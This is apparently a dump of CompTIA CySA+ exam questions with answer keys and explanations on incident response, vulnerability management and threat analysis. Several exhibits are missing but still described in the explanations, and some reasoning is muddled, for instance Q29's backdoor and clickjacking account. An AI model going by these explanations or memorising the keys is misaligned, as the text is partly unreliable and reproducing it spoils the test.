from Your Device, How to Remove Malware From Your PC | PCMag

QUESTION 17
After updating the email client to the latest patch, only about 15% of the workforce is able to use email.
Windows 10 users do not experience issues, but Windows 11 users have constant issues. Which of the
following did the change management team fail to do?

A. Implementation
B. Testing
C. Rollback
D. Validation

Correct Answer: B
Explanation

Explanation/Reference:
Explanation: Testing is a crucial step in any change management process, as it ensures that the change is
compatible with the existing systems and does not cause any errors or disruptions. In this case, the
change management team failed to test the email client patch on Windows 11 devices, which resulted in a
widespread issue for the users. Testing would have revealed the problem before the patch was deployed,
and allowed the team to fix it or postpone the change. References: 7 Reasons Why Change Management
Strategies Fail and How to Avoid Them, CompTIA CySA+ CS0-003 Certification Study Guide

QUESTION 18
Which of the following is the most important reason for an incident response team to develop a formal
incident declaration?

A. To require that an incident be reported through the proper channels

B. To identify and document staff who have the authority to declare an incident
C. To allow for public disclosure of a security event impacting the organization
D. To establish the department that is responsible for responding to an incident

Correct Answer: B
Explanation

Explanation/Reference:
Explanation: The formal incident declaration is crucial to identify and document the staff who have the
authority to declare an incident, ensuring that incidents are handled by authorized personnel. References:
CompTIA CySA+ Study Guide:
Exam CS0-003, 3rd Edition, Chapter 5: Incident Response, page 197.

QUESTION 19
While performing a dynamic analysis of a malicious file, a security analyst notices the memory address
changes every time the process runs. Which of the following controls is most likely preventing the analyst
from finding the proper memory address of the piece of malicious code?
A. Address space layout randomization
B. Data execution prevention
C. Stack canary
D. Code obfuscation

Correct Answer: A
Explanation

Explanation/Reference:
The correct answer is A. Address space layout randomization.

Address space layout randomization (ASLR) is a security control that randomizes the memory address
space of a process, making it harder for an attacker to exploit memory- based vulnerabilities, such as
buffer overflows1. ASLR can also prevent a security analyst from finding the proper memory address of a
piece of malicious code, as the memory address changes every time the process runs2. The other options
are not the best explanations for why the memory address changes every time the process runs. Data
execution prevention (B) is a security control that prevents code from being executed in certain memory
regions, such as the stack or the heap3. Stack canary ?is a security technique that places a random value
on the stack before a function's return address, to detect and prevent stack buffer overflows. Code
obfuscation (D) is a technique that modifies the source code or binary of a program to make it more difficult
to understand or reverse engineer. These techniques do not affect the memory address space of a
process, but rather the execution or analysis of the code.

QUESTION 20
A small company does no! have enough staff to effectively segregate duties to prevent error and fraud in
payroll management. The Chief Information Security Officer (CISO) decides to maintain and review logs
and audit trails to mitigate risk.
Which of the following did the CISO implement?

A. Corrective controls
B. Compensating controls
C. Operational controls
D. Administrative controls

Correct Answer: B
Explanation

Explanation/Reference:
Explanation: Compensating controls are alternative controls that provide a similar level of protection as the
original controls, but are used when the original controls are not feasible or cost-effective. In this case, the
CISO implemented compensating controls by reviewing logs and audit trails to mitigate the risk of error and
fraud in payroll management, since segregating duties was not possible due to the small staff size

QUESTION 21
Which of the following most accurately describes the Cyber Kill Chain methodology?

A. It is used to correlate events to ascertain the TTPs of an attacker.

B. It is used to ascertain lateral movements of an attacker, enabling the process to be stopped.
C. It provides a clear model of how an attacker generally operates during an intrusion and the actions to
take at each stage
D. It outlines a clear path for determining the relationships between the attacker, the technology used, and
the target

Correct Answer: C
Explanation

Explanation/Reference:
Explanation: The Cyber Kill Chain methodology provides a clear model of how an attacker generally
operates during an intrusion and the actions to take at each stage. It is divided into seven stages:
reconnaissance, weaponization, delivery, exploitation, installation, command and control, and actions on
objectives. It helps network defenders understand and prevent cyberattacks by identifying the attacker's
objectives and tactics. References:
The Cyber Kill Chain: The Seven Steps of a Cyberattack

QUESTION 22
The management team requests monthly KPI reports on the company's cybersecurity program. Which of
the following KPIs would identify how long a security threat goes unnoticed in the environment?

A. Employee turnover
B. Intrusion attempts
C. Mean time to detect
D. Level of preparedness

Correct Answer: C
Explanation

Explanation/Reference:
Explanation: Mean time to detect (MTTD) is a metric that measures the average time it takes for an
organization to discover or detect an incident. It is a key performance indicator in incident management
and a measure of incident response capabilities. A low MTTD indicates that the organization can quickly
identify security threats and minimize their impact12.
References: What Is MTTD (Mean Time to Detect)? A Detailed Explanation, Introduction to MTTD: Mean
Time to Detect

QUESTION 23
During a security test, a security analyst found a critical application with a buffer overflow vulnerability.
Which of the following would be best to mitigate the vulnerability at the application level?

A. Perform OS hardening.
B. Implement input validation.
C. Update third-party dependencies.
D. Configure address space layout randomization.

Correct Answer: B
Explanation

Explanation/Reference:
Implementing input validation is the best way to mitigate the buffer overflow vulnerability at the application
level. Input validation is a technique that checks the data entered by users or attackers against a set of
rules or constraints, such as data type, length, format, or range. Input validation can prevent common web
application attacks such as SQL injection, cross-site scripting (XSS), or command injection, which exploit
the lack of input validation to execute malicious code or commands on the server or the client side. By
validating the input before allowing submission, the web application can reject or sanitize any malicious or
unexpected input, and protect the application from being compromised12. References:
How to detect, prevent, and mitigate buffer overflow attacks - Synopsys, How to mitigate buffer overflow
vulnerabilities | Infosec

QUESTION 24
A SOC manager is establishing a reporting process to manage vulnerabilities. Which of the following would
be the best solution to identify potential loss incurred by an issue?

A. Trends
B. Risk score
C. Mitigation
D. Prioritization

Correct Answer: B
Explanation

Explanation/Reference:
Explanation: A risk score is a numerical value that represents the potential impact and likelihood of a
vulnerability being exploited. It can help to identify the potential loss incurred by an issue and prioritize
remediation efforts accordingly.
https://www.comptia.org/training/books/cysa-cs0-003-study-guide

QUESTION 25
A software developer has been deploying web applications with common security risks to include
insufficient logging capabilities. Which of the following actions would be most effective to reduce risks
associated with the application development?

A. Perform static analyses using an integrated development environment.

B. Deploy compensating controls into the environment.
C. Implement server-side logging and automatic updates.
D. Conduct regular code reviews using OWASP best practices.

Correct Answer: D
Explanation

Explanation/Reference:
Explanation: Conducting regular code reviews using OWASP best practices is the most effective action to
reduce risks associated with the application development. Code reviews are a systematic examination of
the source code of an application to detect and fix errors, vulnerabilities, and weaknesses that may
compromise the security, functionality, or performance of the application. Code reviews can help to
improve the quality and security of the code, as well as to identify and remediate common security risks,
such as insufficient logging capabilities. OWASP (Open Web Application Security Project) is a global
nonprofit organization that provides free and open resources, tools, standards, and best practices for web
application security. OWASP best practices for logging include following a common logging format and
approach, logging relevant security events and data, protecting log data from unauthorized access or
modification, and using log analysis and monitoring tools to detect and respond to security incidents. By
following OWASP best practices for logging, developers can ensure that their web applications have
sufficient and effective logging capabilities that can help to prevent, detect, and mitigate security threats.
References: OWASP Logging Cheat Sheet, OWASP Logging Guide, C9: Implement Security Logging and
Monitoring - OWASP Foundation

QUESTION 26
A cybersecurity analyst is recording the following details

* ID

* Name

* Description

* Classification of information

* Responsible party

In which of the following documents is the analyst recording this information?

A. Risk register
B. Change control documentation
C. Incident response playbook
D. Incident response plan

Correct Answer: A
Explanation

Explanation/Reference:
Explanation: A risk register typically contains details like ID, name, description, classification of information,
and responsible party. It's used for tracking identified risks and managing them.Recording details like ID,
Name, Description, Classification of information, and Responsible party is typically done in a Risk Register.
This document is used to identify, assess, manage, and monitor risks within an organization. It's not
directly related to incident response or change control documentation.

QUESTION 27
AXSS vulnerability was reported on one of the non-sensitive/non-mission-critical public websites of a
company. The security department confirmed the finding and needs to provide a recommendation to the
application owner. Which of the following recommendations will best prevent this vulnerability from being
exploited? (Select two).

A. Implement an IPS in front of the web server.

B. Enable MFA on the website.
C. Take the website offline until it is patched.
D. Implement a compensating control in the source code.
E. Configure TLS v1.3 on the website.
F. Fix the vulnerability using a virtual patch at the WAF.

Correct Answer: DF
Explanation

Explanation/Reference:
The best recommendations to prevent an XSS vulnerability from being exploited are to implement a
compensating control in the source code and to fix the vulnerability using a virtual patch at the WAF. A
compensating control is a technique that mitigates the risk of a vulnerability by adding additional security
measures, such as input validation, output encoding, or HTML sanitization. A virtual patch is a rule that
blocks or modifies malicious requests or responses at the WAF level, without modifying the application
code. These recommendations are effective, efficient, and less disruptive than the other options.
References: CompTIA CySA+ Study Guide: Exam CS0-003, 3rd Edition, Chapter 4:
Security Operations and Monitoring, page 156; Cross Site Scripting Prevention Cheat Sheet, Section: XSS
Defense Philosophy.

QUESTION 28
During a recent site survey. an analyst discovered a rogue wireless access point on the network. Which of
the following actions should be taken first to protect the network while preserving evidence?

A. Run a packet sniffer to monitor traffic to and from the access point.
B. Connect to the access point and examine its log files.
C. Identify who is connected to the access point and attempt to find the attacker.
D. Disconnect the access point from the network

Correct Answer: D
Explanation

Explanation/Reference:
Explanation: The correct answer is D. Disconnect the access point from the network.

A rogue access point is a wireless access point that has been installed on a network without the
authorization or knowledge of the network administrator. A rogue access point can pose a serious security
risk, as it can allow unauthorized users to access the network, intercept network traffic, or launch attacks
against the network or its devices1234. The first action that should be taken to protect the network while
preserving evidence is to disconnect the rogue access point from the network. This will prevent any further
damage or compromise of the network by blocking the access point from communicating with other
devices or users. Disconnecting the rogue access point will also preserve its state and configuration, which
can be useful for forensic analysis and investigation. Disconnecting the rogue access point can be done
physically by unplugging it from the network port or wirelessly by disabling its radio frequency5.
The other options are not the best actions to take first, as they may not protect the network or preserve
evidence effectively.
Option A is not the best action to take first, as running a packet sniffer to monitor traffic to and from the
access point may not stop the rogue access point from causing harm to the network. A packet sniffer is a
tool that captures and analyzes network packets, which are units of data that travel across a network. A
packet sniffer can be useful for identifying and troubleshooting network problems, but it may not be able to
prevent or block malicious traffic from a rogue access point. Moreover, running a packet sniffer may
require additional time and resources, which could delay the response and mitigation of the incident5.
Option B is not the best action to take first, as connecting to the access point and examining its log files
may not protect the network or preserve evidence. Connecting to the access point may expose the
analyst's device or credentials to potential attacks or compromise by the rogue access point. Examining its
log files may provide some information about the origin and activity of the rogue access point, but it may
also alter or delete some evidence that could be useful for forensic analysis and investigation.
Furthermore, connecting to the access point and examining its log files may not prevent or stop the rogue
access point from continuing to harm the network5. Option C is not the best action to take first, as
identifying who is connected to the access point and attempting to find the attacker may not protect the
network or preserve evidence. Identifying who is connected to the access point may require additional
tools or techniques, such as scanning for wireless devices or analyzing network traffic, which could take
time and resources away from responding and mitigating the incident. Attempting to find the attacker may
also be difficult or impossible, as the attacker may use various methods to hide their identity or location,
such as encryption, spoofing, or proxy servers. Moreover, identifying who is connected to the access point
and attempting to find the attacker may not prevent or stop the rogue access point from causing further
damage or compromise to the network5.
References:
1 CompTIA Cybersecurity Analyst (CySA+) Certification Exam Objectives 2 Cybersecurity Analyst+ -
CompTIA
3 CompTIA CySA+ CS0-002 Certification Study Guide
4 CertMaster Learn for CySA+ Training - CompTIA
5 How to Protect Against Rogue Access Points on Wi-Fi - Byos 6 Wireless Access Point Protection: 5
Steps to Find Rogue Wi-Fi Networks ...
7 Rogue Access Point - Techopedia
8 Rogue access point - Wikipedia
9 What is a Rogue Access Point (Rogue AP)? - Contextual Security

QUESTION 29
A company brings in a consultant to make improvements to its website. After the consultant leaves. a web
developer notices unusual activity on the website and submits a suspicious file containing the following
code to the security team:

Which of the following did the consultant do?

A. Implanted a backdoor
B. Implemented privilege escalation
C. Implemented clickjacking
D. Patched the web server

Correct Answer: A
Explanation
Explanation/Reference:
The correct answer is A. Implanted a backdoor.

A backdoor is a method that allows an unauthorized user to access a system or network without the
permission or knowledge of the owner. A backdoor can be installed by exploiting a software vulnerability,
by using malware, or by physically modifying the hardware or firmware of the device. A backdoor can be
used for various malicious purposes, such as stealing data, installing malware, executing commands, or
taking control of the system. In this case, the consultant implanted a backdoor in the website by using an
HTML and PHP code snippet that displays an image of a shutdown button and an alert message that says
"Exit". However, the code also echoes the remote address of the server, which means that it sends the IP
address of the visitor to the attacker. This way, the attacker can identify and target the visitors of the
website and use their IP addresses to launch further attacks or gain access to their devices.
The code snippet is an example of a clickjacking attack, which is a type of interface-based attack that tricks
a user into clicking on a hidden or disguised element on a webpage. However, clickjacking is not the main
goal of the consultant, but rather a means to implant the backdoor. Therefore, option C is incorrect.
Option B is also incorrect because privilege escalation is an attack technique that allows an attacker to
gain higher or more permissions than they are supposed to have on a system or network. Privilege
escalation can be achieved by exploiting a software vulnerability, by using malware, or by abusing
misconfigurations or weak access controls. However, there is no evidence that the consultant implemented
privilege escalation on the website or gained any elevated privileges.
Option D is also incorrect because patching is a process of applying updates to software to fix errors,
improve performance, or enhance security. Patching can prevent or mitigate various types of attacks, such
as exploits, malware infections, or denial-of-service attacks. However, there is no indication that the
consultant patched the web server or improved its security in any way.
References:
1 What Is a Backdoor & How to Prevent Backdoor Attacks (2023) 2 What is Clickjacking? Tutorial &
Examples | Web Security Academy 3 What Is Privilege Escalation and How It Relates to Web Security |
Acunetix 4 What Is Patching? | Best Practices For Patch Management - cWatch Blog

QUESTION 30
An analyst is evaluating the following vulnerability report:
Which of the following vulnerability report sections provides information about the level of impact on data
confidentiality if a successful exploitation occurs?

A. Payloads
B. Metrics
C. Vulnerability
D. Profile

Correct Answer: B
Explanation

Explanation/Reference:
The correct answer is B. Metrics.

The Metrics section of the vulnerability report provides information about the level of impact on data
confidentiality if a successful exploitation occurs. The Metrics section contains the CVE dictionary entry
and the CVSS base score of the vulnerability. CVE stands for Common Vulnerabilities and Exposures and
it is a standardized system for identifying and naming vulnerabilities. CVSS stands for Common
Vulnerability Scoring System and it is a standardized system for measuring and rating the severity of
vulnerabilities. The CVSS base score is a numerical value between 0 and 10 that reflects the intrinsic
characteristics of a vulnerability, such as its exploitability, impact, and scope. The CVSS base score is
composed of three metric groups: Base, Temporal, and Environmental. The Base metric group captures
the characteristics of a vulnerability that are constant over time and across user environments. The Base
metric group consists of six metrics: Attack Vector, Attack Complexity, Privileges Required, User
Interaction, Scope, and Impact. The Impact metric measures the effect of a vulnerability on the
confidentiality, integrity, and availability of the affected resources. In this case, the CVSS base score of the
vulnerability is 9.8, which indicates a critical severity level. The Impact metric of the CVSS base score is
6.0, which indicates a high impact on confidentiality, integrity, and availability. Therefore, the Metrics
section provides information about the level of impact on data confidentiality if a successful exploitation
occurs.
The other sections of the vulnerability report do not provide information about the level of impact on data
confidentiality if a successful exploitation occurs. The Payloads section contains links to request and
response payloads that demonstrate how the vulnerability can be exploited. The Payloads section can help
an analyst to understand how the attack works, but it does not provide a quantitative measure of the
impact. The Vulnerability section contains information about the type, group, and description of the
vulnerability. The Vulnerability section can help an analyst to identify and classify the vulnerability, but it
does not provide a numerical value of the impact. The Profile section contains information about the
authentication, times viewed, and aggressiveness of the vulnerability. The Profile section can help an
analyst to assess the risk and priority of the vulnerability, but it does not provide a specific measure of the
impact on data confidentiality.
References:
[1] CVE - Common Vulnerabilities and Exposures (CVE) [2] Common Vulnerability Scoring System SIG
[3] CVSS v3.1 Specification Document
[4] CVSS v3.1 User Guide
[5] How to Read a Vulnerability Report - Security Boulevard

QUESTION 31
A security analyst has found the following suspicious DNS traffic while analyzing a packet capture:

DNS traffic while a tunneling session is active.

The mean time between queries is less than one second.
The average query length exceeds 100 characters.

Which of the following attacks most likely occurred?

A. DNS exfiltration
B. DNS spoofing
C. DNS zone transfer
D. DNS poisoning

Correct Answer: A
Explanation

Explanation/Reference:
Explanation: DNS exfiltration is a technique that uses the DNS protocol to transfer data from a
compromised network or device to an attacker-controlled server. DNS exfiltration can bypass firewall rules
and security products that do not inspect DNS traffic. The characteristics of the suspicious DNS traffic in
the question match the indicators of DNS exfiltration, such as:
DNS traffic while a tunneling session is active: This implies that the DNS protocol is being used to create a
covert channel for data transfer. The mean time between queries is less than one second: This implies that
the DNS queries are being sent at a high frequency to maximize the amount of data transferred.
The average query length exceeds 100 characters: This implies that the DNS queries are encoding large
amounts of data in the subdomains or other fields of the DNS packets.
Official References:
https://partners.comptia.org/docs/default-source/resources/comptia-cysa-cs0-002- exam-objectives
https://resources.infosecinstitute.com/topic/bypassing-security-products-via-dns- data-exfiltration/
https://www.reddit.com/r/CompTIA/comments/nvjuzt/dns_exfiltration_explanation/

QUESTION 32
A security analyst detects an email server that had been compromised in the internal network. Users have
been reporting strange messages in their email inboxes and unusual network traffic. Which of the following
incident response steps should be performed next?

A. Preparation
B. Validation
C. Containment
D. Eradication

Correct Answer: C
Explanation

Explanation/Reference:
Explanation: After detecting a compromised email server and unusual network traffic, the next step in
incident response is containment, to prevent further damage or spread of the compromise. References:
CompTIA CySA+ Study Guide:
Exam CS0-003, 3rd Edition, Chapter 5: Incident Response, page 197.

QUESTION 33
A cybersecurity analyst is doing triage in a SIEM and notices that the time stamps between the firewall and
the host under investigation are off by 43 minutes. Which of the following is the most likely scenario
occurring with the time stamps?

A. The NTP server is not configured on the host.

B. The cybersecurity analyst is looking at the wrong information.
C. The firewall is using UTC time.
D. The host with the logs is offline.

Correct Answer: A
Explanation

Explanation/Reference:
The most likely scenario occurring with the time stamps is that the NTP server is not configured on the
host. NTP is the Network Time Protocol, which is used to synchronize the clocks of computers over a
network. NTP uses a hierarchical system of time sources, where each level is assigned a stratum number.
The most accurate time sources, such as atomic clocks or GPS receivers, are at stratum 0, and the
devices that synchronize with them are at stratum 1, and so on. NTP clients can query multiple NTP
servers and use algorithms to select the best time source and adjust their clocks accordingly1. If the NTP
server is not configured on the host, the host will rely on its own hardware clock, which may drift over time
and become inaccurate. This can cause discrepancies in the time stamps between the host and other
devices on the network, such as the firewall, which may be synchronized with a different NTP server or use
a different time zone. This can affect the security analysis and correlation of events, as well as the
compliance and auditing of the network23. References: How the Windows Time Service Works, Time
Synchronization - All You Need To Know, Firewall rules logging: a closer look at our new network
compliance and ...

QUESTION 34
Which of the following threat-modeling procedures is in the OWASP Web Security Testing Guide?

A. Review Of security requirements

B. Compliance checks
C. Decomposing the application
D. Security by design

Correct Answer: C
Explanation

Explanation/Reference:
The OWASP Web Security Testing Guide (WSTG) includes a section on threat modeling, which is a
structured approach to identify, quantify, and address the security risks associated with an application. The
first step in the threat modeling process is decomposing the application, which involves creating use
cases, identifying entry points, assets, trust levels, and data flow diagrams for the application. This helps to
understand the application and how it interacts with external entities, as well as to identify potential threats
and vulnerabilities1. The other options are not part of the OWASP WSTG threat modeling process.

QUESTION 35
Which of the following techniques would be best to provide the necessary assurance for embedded
software that drives centrifugal pumps at a power Plant?

A. Containerization
B. Manual code reviews
C. Static and dynamic analysis
D. Formal methods

Correct Answer: D
Explanation

Explanation/Reference:
According to the CompTIA CySA+ Study Guide: Exam CS0-003, 3rd Edition1, the best technique to
provide the necessary assurance for embedded software that drives centrifugal pumps at a power plant is
formal methods. Formal methods are a rigorous and mathematical approach to software development and
verification, which can ensure the correctness and reliability of critical software systems. Formal methods
can be used to specify, design, implement, and verify embedded software using formal languages, logics,
and tools1.
Containerization, manual code reviews, and static and dynamic analysis are also useful techniques for
software assurance, but they are not as rigorous or comprehensive as formal methods. Containerization is
a method of isolating and packaging software applications with their dependencies, which can improve
security, portability, and scalability. Manual code reviews are a process of examining the source code of a
software program by human reviewers, which can help identify errors, vulnerabilities, and compliance
issues. Static and dynamic analysis are techniques of testing and evaluating software without executing it
(static) or while executing it (dynamic), which can help detect bugs, defects, and performance issues1.

QUESTION 36
An analyst is evaluating a vulnerability management dashboard. The analyst sees that a previously
remediated vulnerability has reappeared on a database server. Which of the following is the most likely
cause?

A. The finding is a false positive and should be ignored.

B. A rollback had been executed on the instance.
C. The vulnerability scanner was configured without credentials.
D. The vulnerability management software needs to be updated.

Correct Answer: B
Explanation

Explanation/Reference:
A rollback had been executed on the instance. If a database server is restored to a previous state, it may
reintroduce a vulnerability that was previously fixed. This can happen due to backup and recovery
operations, configuration changes, or software updates. A rollback can undo the patching or mitigation
actions that were applied to remediate the vulnerability. References: Vulnerability Remediation: It's Not
Just Patching, Section: The Remediation Process; Vulnerability assessment for SQL Server, Section:
Remediation

QUESTION 37
A security analyst reviews the following results of a Nikto scan:

Which of the following should the security administrator investigate next?

A. tiki
B. phpList
C. shtml.exe
D. sshome

Correct Answer: C
Explanation

Explanation/Reference:
Explanation: The security administrator should investigate shtml.exe next, as it is a potential vulnerability
that allows remote code execution on the web server. Nikto scan results indicate that the web server is
running Apache on Windows, and that the shtml.exe file is accessible in the /scripts/ directory. This file is
part of the Server Side Includes (SSI) feature, which allows dynamic content generation on web pages.
However, if the SSI feature is not configured properly, it can allow attackers to execute arbitrary commands
on the web server by injecting malicious code into the URL or the web page12. Therefore, the security
administrator should check the SSI configuration and permissions, and remove or disable the shtml.exe file
if it is not needed. References: Nikto-Penetration testing.
Introduction, Web application scanning with Nikto

QUESTION 38
Which of the following is a nation-state actor least likely to be concerned with?

A. Detection by MITRE ATT&CK framework.

B. Detection or prevention of reconnaissance activities.
C. Examination of its actions and objectives.
D. Forensic analysis for legal action of the actions taken

Correct Answer: D
Explanation

Explanation/Reference:
Explanation: A nation-state actor is a group or individual that conducts cyberattacks on behalf of a
government or a political entity. They are usually motivated by national interests, such as espionage,
sabotage, or influence operations. They are often highly skilled, resourced, and persistent, and they
operate with the protection or support of their state sponsors. Therefore, they are less likely to be
concerned with the forensic analysis for legal action of their actions, as they are unlikely to face
prosecution or extradition in their own country or by international law. They are more likely to be concerned
with the detection by the MITRE ATT&CK framework, which is a knowledge base of adversary tactics and
techniques based on real-world observations. The MITRE ATT&CK framework can help defenders identify,
prevent, and respond to cyberattacks by nation-state actors. They are also likely to be concerned with the
detection or prevention of reconnaissance activities, which are the preliminary steps of cyberattacks that
involve gathering information about the target, such as vulnerabilities, network topology, or user
credentials. Reconnaissance activities can expose the presence, intent, and capabilities of the attackers,
and allow defenders to take countermeasures. Finally, they are likely to be concerned with the examination
of their actions and objectives, which can reveal their motives, strategies, and goals, and help defenders
understand their threat profile and attribution.
References:
1: MITRE ATT&CK?
2: What is the MITRE ATT&CK Framework? | IBM
3: MITRE ATT&CK | MITRE
4: Cyber Forensics Explained: Reasons, Phases & Challenges of Cyber Forensics | Splunk
5: Digital Forensics: How to Identify the Cause of a Cyber Attack - G2

QUESTION 39
A vulnerability management team found four major vulnerabilities during an assessment and needs to
provide a report for the proper prioritization for further mitigation. Which of the following vulnerabilities
should have the highest priority for the mitigation process?

A. A vulnerability that has related threats and loCs, targeting a different industry
B. A vulnerability that is related to a specific adversary campaign, with loCs found in the SIEM
C. A vulnerability that has no adversaries using it or associated loCs
D. A vulnerability that is related to an isolated system, with no loCs

Correct Answer: B
Explanation

Explanation/Reference:
A vulnerability that is related to a specific adversary campaign, with IoCs found in the SIEM, should have
the highest priority for the mitigation process. This is because it indicates that the vulnerability is actively
being exploited by a known threat actor, and that the organization's security monitoring system has
detected signs of compromise. This poses a high risk of data breach, service disruption, or other adverse
impacts. References:
How to Prioritize Vulnerabilities Effectively: Vulnerability Prioritization Explained, Section:
How to prioritize vulnerabilities step by step to avoid drowning in sea of problems; CompTIA CySA+ Study
Guide: Exam CS0-003, 3rd Edition, Chapter 4: Security Operations and Monitoring, page 156.

QUESTION 40
During an incident, some loCs of possible ransomware contamination were found in a group of servers in a
segment of the network. Which of the following steps should be taken next?

A. Isolation
B. Remediation
C. Reimaging
D. Preservation

Correct Answer: A
Explanation

Explanation/Reference:
Explanation: Isolation is the first step to take after detecting some indicators of compromise (IoCs) of
possible ransomware contamination. Isolation prevents the ransomware from spreading to other servers or
segments of the network, and allows the security team to investigate and contain the incident. Isolation can
be done by disconnecting the infected servers from the network, blocking the malicious traffic, or applying
firewall rules12.
References: 10 Things You Should Do After a Ransomware Attack, How to Recover from a Ransomware
Attack: A Step-by-Step Guide

QUESTION 41
Which of the following entities should an incident manager work with to ensure correct processes are
adhered to when communicating incident reporting to the general public, as a best practice? (Select two).

A. Law enforcement
B. Governance
C. Legal
D. Manager
E. Public relations
F. Human resources

Correct Answer: CE
Explanation

Explanation/Reference:
An incident manager should work with the legal and public relations entities to ensure correct processes
are adhered to when communicating incident reporting to the general public, as a best practice. The legal
entity can provide guidance on the legal implications and obligations of disclosing the incident, such as
compliance with data protection laws, contractual obligations, and liability issues. The public relations entity
can help craft the appropriate message and tone for the public communication, as well as manage the
reputation and image of the organization in the aftermath of the incident. These two entities can help the
incident manager balance the need for transparency and accountability with the need for confidentiality
and security12. References: Incident Communication Templates, Incident Management: Processes, Best
Practices & Tools - Atlassian

QUESTION 42
A security analyst is reviewing events that occurred during a possible compromise. The analyst obtains the
following log:
Which of the following is most likely occurring, based on the events in the log?

A. An adversary is attempting to find the shortest path of compromise.

B. An adversary is performing a vulnerability scan.
C. An adversary is escalating privileges.
D. An adversary is performing a password stuffing attack.

Correct Answer: B
Explanation

Explanation/Reference:
Based on the events in the log, the most likely occurrence is that an adversary is performing a vulnerability
scan. The log shows LDAP read operations and EDR enumerating local groups, which are indicative of an
adversary scanning the system to find vulnerabilities or sensitive information. The final entry shows SMB
connection attempts to multiple hosts from a single host, which could be a sign of network discovery or
lateral movement. References: CompTIA CySA+ Study Guide: Exam CS0-003, 3rd Edition, Chapter 4:
Security Operations and Monitoring, page 161; Monitor logs from vulnerability scanners, Section: Reports
on Nessus vulnerability data.

QUESTION 43
Which of the following would an organization use to develop a business continuity plan?

A. A diagram of all systems and interdependent applications

B. A repository for all the software used by the organization
C. A prioritized list of critical systems defined by executive leadership
D. A configuration management database in print at an off-site location

Correct Answer: C
Explanation

Explanation/Reference:
A prioritized list of critical systems defined by executive leadership is the best option to use to develop a
business continuity plan. A business continuity plan (BCP) is a system of prevention and recovery from
potential threats to a company. The plan ensures that personnel and assets are protected and are able to
function quickly in the event of a disaster1. A BCP should include a business impact analysis, which
identifies the critical systems and processes that are essential for the continuity of the business operations,
and the potential impacts of their disruption2. The executive leadership should be involved in defining the
critical systems and their priorities, as they have the strategic vision and authority to make decisions that
affect the whole organization3. A diagram of all systems and interdependent applications, a repository for
all the software used by the organization, and a configuration management database in print at an off-site
location are all useful tools for documenting and managing the IT infrastructure, but they are not sufficient
to develop a comprehensive BCP that covers all aspects of the business continuity4. References: What Is
a Business Continuity Plan (BCP), and How Does It Work?, Business continuity plan (BCP) in 8 steps, with
templates, Business continuity planning | Business Queensland, Understanding the Essentials of a
Business Continuity Plan
QUESTION 44
When investigating a potentially compromised host, an analyst observes that the process BGInfo.exe (PID
1024), a Sysinternals tool used to create desktop backgrounds containing host details, has bee running for
over two days. Which of the following activities will provide the best insight into this potentially malicious
process, based on the anomalous behavior?

A. Changes to system environment variables

B. SMB network traffic related to the system process
C. Recent browser history of the primary user
D. Activities taken by PID 1024

Correct Answer: D
Explanation

Explanation/Reference:
Explanation: The activities taken by the process with PID 1024 will provide the best insight into this
potentially malicious process, based on the anomalous behavior. BGInfo.exe is a legitimate tool that
displays system information on the desktop background, but it can also be used by attackers to gather
information about the compromised host or to disguise malicious processes12. By monitoring the activities
of PID 1024, such as the files it accesses, the network connections it makes, or the commands it executes,
the analyst can determine if the process is benign or malicious.
References: bginfo.exe Windows process - What is it?, What is bginfo.exe? Is it Safe or a Virus? How to
remove or fix it

QUESTION 45
A security analyst is reviewing the logs of a web server and notices that an attacker has attempted to
exploit a SQL injection vulnerability. Which of the following tools can the analyst use to analyze the attack
and prevent future attacks?

A. A web application firewall

B. A network intrusion detection system
C. A vulnerability scanner
D. A web proxy

Correct Answer: A
Explanation

Explanation/Reference:
Explanation: A web application firewall (WAF) is a tool that can protect web servers from attacks such as
SQL injection, cross-site scripting, and other web-based threats. A WAF can filter, monitor, and block
malicious HTTP traffic before it reaches the web server. A WAF can also be configured with rules and
policies to detect and prevent specific types of attacks.
References: CompTIA CySA+ Study Guide: Exam CS0-002, 2nd Edition, Chapter 3, "Security Architecture
and Tool Sets", page 91; CompTIA CySA+ Certification Exam Objectives Version 4.0, Domain 1.0 "Threat
and Vulnerability Management", Objective 1.2 "Given a scenario, analyze the results of a network
reconnaissance", Sub-objective "Web application attacks", page 9 CompTIA CySA+ Study Guide: Exam
CS0-002, 2nd Edition : CompTIA CySA+ Certification Exam Objectives Version 4.0.pdf)

QUESTION 46
An attacker recently gained unauthorized access to a financial institution's database, which contains
confidential information. The attacker exfiltrated a large amount of data before being detected and blocked.
A security analyst needs to complete a root cause analysis to determine how the attacker was able to gain
access. Which of the following should the analyst perform first?

A. Document the incident and any findings related to the attack for future reference.
B. Interview employees responsible for managing the affected systems.
C. Review the log files that record all events related to client applications and user access.
D. Identify the immediate actions that need to be taken to contain the incident and minimize damage.

Correct Answer: C
Explanation

Explanation/Reference:
Explanation: In a root cause analysis following unauthorized access, the initial step is usually to review
relevant log files. These logs can provide critical information about how and when the attacker gained
access. The first step in a root cause analysis after a data breach is typically to review the logs. This helps
the analyst understand how the attacker gained access by providing a detailed record of all events,
including unauthorized or abnormal activities. Documenting the incident, interviewing employees, and
identifying immediate containment actions are important steps, but they usually follow the initial log review.

QUESTION 47
An analyst discovers unusual outbound connections to an IP that was previously blocked at the web proxy
and firewall. Upon further investigation, it appears that the proxy and firewall rules that were in place were
removed by a service account that is not recognized. Which of the following parts of the Cyber Kill Chain
does this describe?

A. Delivery
B. Command and control
C. Reconnaissance
D. Weaporization

Correct Answer: B
Explanation

Explanation/Reference:
Explanation: The Command and Control stage of the Cyber Kill Chain describes the communication
between the attacker and the compromised system. The attacker may use this channel to send
commands, receive data, or update malware. If the analyst discovers unusual outbound connections to an
IP that was previously blocked, it may indicate that the attacker has established a command and control
channel and bypassed the security controls. References: Cyber Kill Chain?| Lockheed Martin

QUESTION 48
A security analyst received an alert regarding multiple successful MFA log-ins for a particular user When
reviewing the authentication logs the analyst sees the following:

Which of the following are most likely occurring, based on the MFA logs? (Select two).

A. Dictionary attack
B. Push phishing
C. impossible geo-velocity
D. Subscriber identity module swapping
E. Rogue access point
F. Password spray

Correct Answer: BC
Explanation

Explanation/Reference:
Explanation: C. Impossible geo-velocity: This is an event where a single user's account is accessed from
different geographical locations within a timeframe that is impossible for normal human travel. In the log,
we can see that the user "jdoe" is accessing from the United States and then within a few minutes from
Russia, which is practically impossible to achieve without the use of some form of automated system or if
the account credentials are being used by different individuals in different locations. B. Push phishing: This
could also be an indication of push phishing, where the user is tricked into approving a multi-factor
authentication request that they did not initiate. This is less clear from the logs directly, but it could be
inferred if the user is receiving MFA requests that they are not initiating and are being approved without
their genuine desire to access the resources.

QUESTION 49
